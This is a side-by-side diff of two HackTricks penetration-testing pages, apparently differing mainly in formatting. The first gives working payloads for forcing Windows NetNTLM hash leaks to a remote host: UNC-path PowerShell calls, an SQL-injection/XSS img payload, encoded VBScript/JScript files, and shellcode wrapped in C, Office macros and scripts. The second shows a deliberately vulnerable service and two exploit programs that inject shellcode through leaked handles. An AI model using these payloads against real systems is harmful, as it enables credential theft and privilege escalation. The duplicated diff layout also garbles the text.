||||||
You can add a new registry key in any of the following paths.
|
You can add a new registry key in any of the following paths.
|
||||||
|
|
||||||
```text
|
```
|
||||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
|
||||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/registry.png?w=640)
|
![](<../../.gitbook/assets/image (307).png>)
|
||||||
|
|
||||||
# Powershell
|
## Powershell
|
||||||
|
|
||||||
There are probably many scriptlets in Powershell that would resolve a network path.
|
There are probably many scriptlets in Powershell that would resolve a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
Invoke-Item \\192.168.0.1\aa
|
Invoke-Item \\192.168.0.1\aa
|
||||||
Get-Content \\192.168.0.1\aa
|
Get-Content \\192.168.0.1\aa
|
||||||
Start-Process \\192.168.0.1\aa
|
Start-Process \\192.168.0.1\aa
|
||||||
```
|
```
|
||||||
|
|
||||||
# IE
|
## IE
|
||||||
|
|
||||||
IE will resolve UNC paths. For example
|
IE will resolve UNC paths. For example
|
||||||
|
|
||||||
```text
|
```
|
||||||
<img src="\\\\192.168.0.1\\aa">
|
<img src="\\\\192.168.0.1\\aa">
|
||||||
```
|
```
|
||||||
|
|
||||||
You can inject under XSS or in scenarios you find SQL injection. For example.
|
You can inject under XSS or in scenarios you find SQL injection. For example.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||||
```
|
```
|
||||||
|
|
||||||
# VBScript
|
## VBScript
|
||||||
|
|
||||||
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
|
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
|
||||||
|
|
||||||
|
@ -340,13 +335,13 @@ Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
|
||||||
|
|
||||||
Here’ the encoded version. You can encode and save this as something.vbe
|
Here’ the encoded version. You can encode and save this as something.vbe
|
||||||
|
|
||||||
```text
|
```
|
||||||
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
||||||
```
|
```
|
||||||
|
|
||||||
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
||||||
|
|
||||||
```text
|
```
|
||||||
<html>
|
<html>
|
||||||
<script type="text/Vbscript.Encode">
|
<script type="text/Vbscript.Encode">
|
||||||
<!--
|
<!--
|
||||||
|
@ -356,7 +351,7 @@ You can apply this in html files too. But only works with IE. You can save this
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
# JScript
|
## JScript
|
||||||
|
|
||||||
You can save this as something.js under windows.
|
You can save this as something.js under windows.
|
||||||
|
|
||||||
|
@ -380,7 +375,7 @@ fso.FileExists("//192.168.0.103/aa")
|
||||||
|
|
||||||
Here’s the encoded version. You can save this as something.jse.
|
Here’s the encoded version. You can save this as something.jse.
|
||||||
|
|
||||||
```text
|
```
|
||||||
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
|
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -396,7 +391,7 @@ The html version of this.
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
# Windows Script Files
|
## Windows Script Files
|
||||||
|
|
||||||
Save this as something.wsf.
|
Save this as something.wsf.
|
||||||
|
|
||||||
|
@ -411,11 +406,11 @@ Save this as something.wsf.
|
||||||
</package>
|
</package>
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shellcode
|
## Shellcode
|
||||||
|
|
||||||
Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
|
Here’s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
|
||||||
|
|
||||||
```text
|
```cpp
|
||||||
/*
|
/*
|
||||||
Title: CreateFile Shellcode
|
Title: CreateFile Shellcode
|
||||||
Author: Osanda Malith Jayathissa (@OsandaMalith)
|
Author: Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
|
@ -474,13 +469,11 @@ int main() {
|
||||||
|
|
||||||
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
|
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png?w=640)
|
## Shellcode Inside Macros
|
||||||
|
|
||||||
# Shellcode Inside Macros
|
|
||||||
|
|
||||||
Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
|
Here’s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
|
||||||
|
|
||||||
```text
|
```basic
|
||||||
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
' Title: Shellcode to request a non-existing network path
|
' Title: Shellcode to request a non-existing network path
|
||||||
' Website: https://osandamalith
|
' Website: https://osandamalith
|
||||||
|
@ -576,16 +569,16 @@ End Sub
|
||||||
|
|
||||||
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
|
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
|
||||||
|
|
||||||
# Shellcode Inside VBS and JS
|
## Shellcode Inside VBS and JS
|
||||||
|
|
||||||
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.
|
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.\
|
||||||
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)
|
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)\
|
||||||
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.
|
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.\
|
||||||
Note the following shellcode directs to my IP.
|
Note the following shellcode directs to my IP.
|
||||||
|
|
||||||
### JScript
|
#### JScript
|
||||||
|
|
||||||
```text
|
```javascript
|
||||||
/*
|
/*
|
||||||
* Author : Osanda Malith Jayathissa (@OsandaMalith)
|
* Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
* Title: Shellcode to request a non-existing network path
|
* Title: Shellcode to request a non-existing network path
|
||||||
|
@ -629,9 +622,9 @@ var thread = DX.CreateThread(0,0,scLocation,0,0);
|
||||||
|
|
||||||
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
|
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
|
||||||
|
|
||||||
### VBScript
|
#### VBScript
|
||||||
|
|
||||||
```text
|
```vba
|
||||||
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
' Author : Osanda Malith Jayathissa (@OsandaMalith)
|
||||||
' Title: Shellcode to request a non-existing network path
|
' Title: Shellcode to request a non-existing network path
|
||||||
' Website: https://osandamalith.com
|
' Website: https://osandamalith.com
|
||||||
|
@ -680,13 +673,11 @@ thread = DX.CreateThread (0,0,scLocation,0,0)
|
||||||
|
|
||||||
There might be many other ways in Windows. You never know! 🙂
|
There might be many other ways in Windows. You never know! 🙂
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||||
* [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
|
* [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
@ -702,5 +693,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Leaked Handle Exploitation
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,21 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Introduction
|
||||||
# Introduction
|
|
||||||
|
|
||||||
Handles in a process allow to **access** different **Windows resources**:
|
Handles in a process allow to **access** different **Windows resources**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (663).png>)
|
![](<../../.gitbook/assets/image (663) (1).png>)
|
||||||
|
|
||||||
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
|
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
|
||||||
|
|
||||||
For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
|
For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
|
||||||
Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
|
Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
|
||||||
|
|
||||||
# **Interesting Handles**
|
## **Interesting Handles**
|
||||||
|
|
||||||
## **Process**
|
### **Process**
|
||||||
|
|
||||||
As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
||||||
|
|
||||||
|
@ -42,7 +41,7 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
|
||||||
* PROCESS\_DUP\_HANDLE
|
* PROCESS\_DUP\_HANDLE
|
||||||
* PROCESS\_VM\_WRITE
|
* PROCESS\_VM\_WRITE
|
||||||
|
|
||||||
## Thread
|
### Thread
|
||||||
|
|
||||||
Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
|
||||||
|
|
||||||
|
@ -52,15 +51,15 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
|
||||||
* THREAD\_DIRECT\_IMPERSONATION
|
* THREAD\_DIRECT\_IMPERSONATION
|
||||||
* THREAD\_SET\_CONTEXT
|
* THREAD\_SET\_CONTEXT
|
||||||
|
|
||||||
## File, Key & Section Handles
|
### File, Key & Section Handles
|
||||||
|
|
||||||
If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
|
If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
|
||||||
|
|
||||||
**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
|
**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
|
||||||
|
|
||||||
# How to see handles of processes
|
## How to see handles of processes
|
||||||
|
|
||||||
## Process Hacker
|
### Process Hacker
|
||||||
|
|
||||||
[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
|
[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
|
||||||
|
|
||||||
|
@ -74,17 +73,17 @@ You can then right click on the handle and **check the permissions**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (628).png>)
|
![](<../../.gitbook/assets/image (628).png>)
|
||||||
|
|
||||||
## Sysinternals Handles
|
### Sysinternals Handles
|
||||||
|
|
||||||
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
|
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (654).png>)
|
![](<../../.gitbook/assets/image (654).png>)
|
||||||
|
|
||||||
## LeakedHandlesFinder
|
### LeakedHandlesFinder
|
||||||
|
|
||||||
[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
|
[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
|
||||||
|
|
||||||
## Methodology
|
### Methodology
|
||||||
|
|
||||||
Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
|
Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
|
||||||
|
|
||||||
|
@ -96,7 +95,7 @@ handle64.exe /a | findstr /r /i "process thread file key pid:"
|
||||||
```
|
```
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
# Vulnerable Example
|
## Vulnerable Example
|
||||||
|
|
||||||
For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
|
For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
|
||||||
|
|
||||||
|
@ -308,7 +307,7 @@ int _tmain( int argc, TCHAR* argv[] )
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Exploit Example 1
|
### Exploit Example 1
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
||||||
|
@ -521,7 +520,7 @@ int main(int argc, char **argv) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Exploit Example 2
|
### Exploit Example 2
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
|
||||||
|
@ -692,7 +691,7 @@ int main(int argc, char **argv) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
# Other tools and examples
|
## Other tools and examples
|
||||||
|
|
||||||
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
|
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
|
||||||
|
|
||||||
|
@ -702,13 +701,12 @@ This tool allows you to monitor leaked handles to find vulnerable ones and even
|
||||||
|
|
||||||
Another tool to leak a handle and exploit it.
|
Another tool to leak a handle and exploit it.
|
||||||
|
|
||||||
# References
|
## References
|
||||||
|
|
||||||
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
|
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
|
||||||
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
|
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
|
||||||
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
|
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
@ -724,5 +722,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|